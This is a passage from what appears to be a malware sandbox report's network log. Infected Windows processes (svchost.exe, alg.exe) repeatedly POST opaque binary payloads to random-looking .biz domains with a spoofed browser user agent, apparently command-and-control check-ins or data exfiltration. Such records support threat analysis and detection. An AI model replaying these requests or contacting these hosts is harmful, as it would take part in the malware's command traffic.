                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h).Fv*2YJz6Rs'Eq}p_xGVT2(%$*o\t+!l+a;|`v4qvPf_c.8,R &AmKsM5\+e>z_I_=,;{r#&GkPticNLI3w[F_A 79*%==zLM
Oct 8, 2024 15:28:42.483659983 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=537677ccf0badce01ffc9a24ee2754b2|8.46.123.33|1728394121|1728394121|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49815 | 172.234.222.143 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:42.519171953 CEST | 348 | OUT | POST /dgcyhyi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:42.519207954 CEST | 786 | OUT | Data Raw: 99 92 ca ad 90 b6 86 3a 06 03 00 00 0b 6e 3c da c0 eb f4 28 51 b0 8d 4d 6a 60 0a 0a c6 21 31 7c 8a 13 5a 67 fd e4 99 2a b4 f6 24 ae ad 11 40 ec ad fa a5 2b e5 da a4 8b 94 7c fc 39 eb 7b de ee 58 eb 13 79 ad 9b 0d 58 63 7d b7 7a b4 86 3c 81 dd c4
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :n<(QMj`!1|Zg*$@+|9{XyXc}z<-P3.2yA#no&d}[qZl>@Xm=%f`x;Hm 0ZTk*YWE,q6.xs#")g5}[J5[A


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49820 | 44.221.84.105 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:42.923901081 CEST | 349 | OUT | POST /lnlr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:28:42.923935890 CEST | 778 | OUT | Data Raw: 98 37 15 b4 de 3e b3 03 fe 02 00 00 c5 6a e6 ff b9 c7 c6 2f e7 5d 3b 7f e8 eb 6c 03 36 4a 1c d7 f8 ad 7a c9 e5 ab 57 55 01 f2 3a 2c 92 b3 bf e3 c6 d6 8e 24 9f 2c 5d c5 4e 0e c3 d6 53 2d 1e f0 27 1a 89 24 ad ea 72 fd 62 d8 4a e8 75 3c 3e b6 9c e9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7>j/];l6JzWU:,$,]NS-'$rbJu<>\eg9OvTKy&``N6q;5`0r('W5JK'@"mKgvD5/j3gD.4(;]izT_."`*1r4[_!,"&#^5Xzy$
Oct 8, 2024 15:28:43.413654089 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cebc97516ee1f879bcaeaf02a575af98|8.46.123.33|1728394123|1728394123|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49821 | 172.234.222.143 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:43.052089930 CEST | 350 | OUT | POST /atyxaeuca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:43.052119970 CEST | 786 | OUT | Data Raw: 38 68 83 db c9 52 2c ea 06 03 00 00 7e e7 fe 65 9b 7b 83 e9 74 29 eb 08 b9 ab 06 17 7d ca 32 b1 9b 8e 42 b7 fc 03 2e 54 2a 37 52 0e 08 9a eb ea b3 ac 08 86 7e 59 03 09 5f 94 2e e4 3f f7 25 a6 2c c8 0b 66 fa 2e 1e 0b 17 a6 1e 2f f5 b4 57 5a ae ca
Data Ascii: 8hR,~e{t)}2B.T*7R~Y_.?%,f./WZ%osDwZ"[(Xr`(tW^JQxnD@{8ydZC9LK\0"7G^I#;\_0G!ICTbKFSPJD%^p9YNs}Oe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49828 | 34.246.200.160 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:43.635837078 CEST | 353 | OUT | POST /ioljnnvkrvc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:43.636595964 CEST | 786 | OUT | Data Raw: e2 b2 d4 2d 99 df a2 07 06 03 00 00 85 2b 01 6f c9 2b 17 7d 73 ba 4a af 3e ed 7b 1b 02 21 bb 0e 25 ac 5b 97 30 aa 7b f3 73 4d c6 33 59 8c 53 60 4f 15 b6 76 5b 26 c1 16 48 ab 35 d7 fe b4 76 4b 11 c7 0e 58 1b 6d a6 00 75 66 27 1a 22 fe b6 fd 34 2f
Data Ascii: -+o+}sJ>{!%[0{sM3YS`Ov[&H5vKXmuf'"4/iR*#<6(/?bJX4OpY<j0&6K$A}X`'`/AF+_D#}g?y{iYzN=#)<4}@e^ZG~)yd`K>9g8(+
Oct 8, 2024 15:28:44.385585070 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0ba3b42b59b9ffe390ae9374c1f369ed|8.46.123.33|1728394124|1728394124|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49829 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:43.835432053 CEST | 349 | OUT | POST /vcjmpg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:28:43.835457087 CEST | 778 | OUT | Data Raw: 72 e7 de 25 3a ea fd 8e fe 02 00 00 80 0f 0b 07 d1 25 89 f3 30 6d de 4e 0f ce 3d 54 fd 67 b6 71 d8 8d bc fb 6b ab f4 06 93 a3 e7 68 30 b9 2a 85 d8 35 f6 06 c8 4e 61 41 12 49 17 bc 70 46 3f 09 03 cb 70 ad e5 b1 39 72 46 01 8b 53 49 85 58 97 b6 fe
Data Ascii: r%:%0mN=Tgqkh0*5NaAIpF?p9rFSIXIJ8\ac::ot+/Et=MM693x!W(z\k5F,5T\Ss:$>~^j**l7otzR'UwS)9OfjE:.#
Oct 8, 2024 15:28:45.153393030 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4393a9137aaec9a5beef330ee835251b|8.46.123.33|1728394124|1728394124|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              35192.168.2.44983518.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.474302053 CEST346OUTPOST /luaao HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:44.474328995 CEST | 786 | OUT | Data Raw: ad bd 00 0f d0 74 c3 55 06 03 00 00 91 9f a1 99 f2 3e 5a 84 33 93 51 31 e9 ba b5 ec 8b cd 47 31 b0 1e 2f ea dd ef 7c 7e e4 8b c1 0d 0f 13 95 20 e3 7a ef c5 d3 b0 be 75 e5 2c 57 1d b0 83 5e 80 4e 66 91 91 4a c1 6e 13 6d 27 bf a6 92 89 00 09 1c 10
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tU>Z3Q1G1/|~ zu,W^NfJnm'DKMWPoE/*jU}aXX5%$m+4c{D=$!fv>B>Q((&0Oa.>R'@Sn?!4`5HuI" dZJ,;fk91I&zTezp'I
Oct 8, 2024 15:28:44.952984095 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=dd9d6ec2d28fa711b094b6e5603eb1ce|8.46.123.33|1728394124|1728394124|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49839 | 208.100.26.245 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:45.019335032 CEST | 355 | OUT | POST /ewjlslyiisf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:45.019351959 CEST | 786 | OUT | Data Raw: f0 7b 4b 77 4d 29 2a 5c 06 03 00 00 17 96 4a 69 88 4d b8 db 6c f2 ea 8c 07 f7 0b e9 3b 3b 8a ad ca aa 8e ad 50 93 4b 7f 4b 6b b7 e5 b9 78 74 43 08 e1 63 fc 3f f2 3f 87 c4 4c ee d0 d8 ed f8 56 eb bb 2c 73 98 45 c5 19 9a 4f 0d 0d ab ff b3 e7 1b 49
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {KwM)*\JiMl;;PKKkxtCc??LV,sEOI*b%#3joC(]etlEWhkLbquPYU<V6)VuQ4m_)0b jJ80@s7b4]jQ!
Oct 8, 2024 15:28:45.650996923 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:45.698288918 CEST | 359 | OUT | POST /fnaptxelbkqpwkk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:45.698338032 CEST | 786 | OUT | Data Raw: fe 3d d6 7e de a3 d9 18 06 03 00 00 bb 8e dd 84 a6 75 a9 9b 26 7a c5 48 27 fa c8 b9 be 6e c9 57 1f dc 21 b8 e6 0c 2f ca a8 15 f9 79 82 04 44 8e 1e 7d fb 6a 12 9e 3e e8 8b a3 ac 90 25 b6 9d 7c 9c da 2a c5 15 1b ea 3a 68 3a b3 91 b6 d4 e3 03 9c ef
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =~u&zH'nW!/yD}j>%|*:h:|`Jj~;x|lRA-Tu\/zi4@u)~#F$4Yk[lWK8wY~M"}<FMGB<]Gy<zH4USh\
Oct 8, 2024 15:28:45.828318119 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49843 | 172.234.222.138 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:45.658457994 CEST | 357 | OUT | POST /wtdwobcctwkccpvu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:45.658483028 CEST | 778 | OUT | Data Raw: 74 82 12 aa bf d6 ba 02 fe 02 00 00 b2 e1 23 5e 4b b6 92 1c 50 30 31 ad 13 46 cd 5e 39 89 54 62 0c c2 94 25 fd 85 4e 1f 30 0f 23 80 4d ae 4a 0b e6 57 fa 8e 50 16 c0 60 7e 57 c4 cb 34 09 b1 6f 86 44 fe 39 17 0b 09 ee 0b dd b4 ac 62 e3 0d 7c c0 84
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t#^KP01F^9Tb%N0#MJWP`~W4oD9b|2l]hDn^FT}E$RP~!MTsPWJr~[q}mJ51V"RRo,G{c]u8fYA38J\f/b;oW)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49848 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:45.950036049 CEST | 357 | OUT | POST /vyoggvtcvxheoco HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:45.950057030 CEST | 786 | OUT | Data Raw: 67 35 0a 82 27 40 4b d4 06 03 00 00 d7 f9 da 98 ae 2c a2 4c f1 04 83 13 7d c4 8f fb 01 7a f8 0e d0 01 25 93 cd 1c 47 8a 29 0f 50 d5 b3 97 50 a1 56 1c b7 dd 89 d6 0f bf df 54 45 24 c3 6a 9d 3e 9b 3e b6 e3 6a 6a ff ab c9 42 b9 b4 db 0b 53 cd 00 9b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: g5'@K,L}z%G)PPVTE$j>>jjBSB+,uEZ)_:<nr'!#;U'g T":pAWb^SI2^BX>Cwen`4x**H(B4]t)=5hz;QUB[E*E^T
Oct 8, 2024 15:28:47.276556015 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=07ddee4a01ffef4c3b8ebffc27f4a384|8.46.123.33|1728394127|1728394127|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49851 | 172.234.222.138 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:46.512016058 CEST | 342 | OUT | POST /d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:46.512027979 CEST | 778 | OUT | Data Raw: a0 1e 05 1b a7 0b 78 56 fe 02 00 00 89 49 39 d1 3e e9 7c ce 6d f4 35 7f c8 7a 27 3b d3 94 cd dc 1c 52 2e a0 b7 e5 4b 4b 2f 8b 1f 0b a9 2a 84 02 83 80 bd dd 82 77 30 46 a8 ad f5 f6 fc b7 b9 ae 9f 8d 25 e9 7a 1a ee 44 69 55 40 85 a5 bd da 11 26 a0
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: xVI9>|m5z';R.KK/*w0F%zDiU@&:Q' /"|/,,y\|HAP1>,GqKNm1 1d+H_uFdxuhJ45xNOAFZh})$v2p-};2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49857 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:47.385170937 CEST | 352 | OUT | POST /qjuvsft HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:47.385171890 CEST | 786 | OUT | Data Raw: 90 be e7 00 eb b2 35 d9 06 03 00 00 f0 7c 09 7a db 6d 43 bc fb 20 04 07 66 f1 ad c4 7a 37 a8 f2 d4 a8 cc c9 96 e2 d6 30 d9 03 96 47 78 d3 af f6 f3 be 63 5a f0 46 2b 00 0b 43 70 63 08 29 ec c8 3b 66 86 15 f5 96 35 2b fe e3 45 90 9e 36 91 b9 30 ac
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5|zmC fz70GxcZF+Cpc);f5+E60O3sV|3J"qC;9`~DKtAfA!" n'I;W L.l*\'4/K|^.`n~ckWsDo=AO*<Q}KEA2nAc'}iW
Oct 8, 2024 15:28:47.873085022 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4611861d879b4a485cfc52167a57b3aa|8.46.123.33|1728394127|1728394127|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49858 | 34.246.200.160 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:47.386012077 CEST | 346 | OUT | POST /bvee HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:47.386035919 CEST | 778 | OUT | Data Raw: 90 56 a6 40 83 72 af 49 fe 02 00 00 ee 7f 1c f5 6d 2a c9 4d 91 09 26 22 98 c4 67 9b 90 3e 7f 97 5c 1a dd 15 36 f7 ee a4 18 b8 d4 01 97 fe 23 9d c0 b5 3c 7a f3 d5 23 26 af d6 22 b0 c8 95 7a ce e0 4f f1 b0 81 38 11 50 9b ff dc c1 9c 3d 8c 38 9b 31
Oct 8, 2024 15:28:48.153779030 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fb58dac2d19c3097f52c26e5f09d0bb4|8.46.123.33|1728394128|1728394128|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49864 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
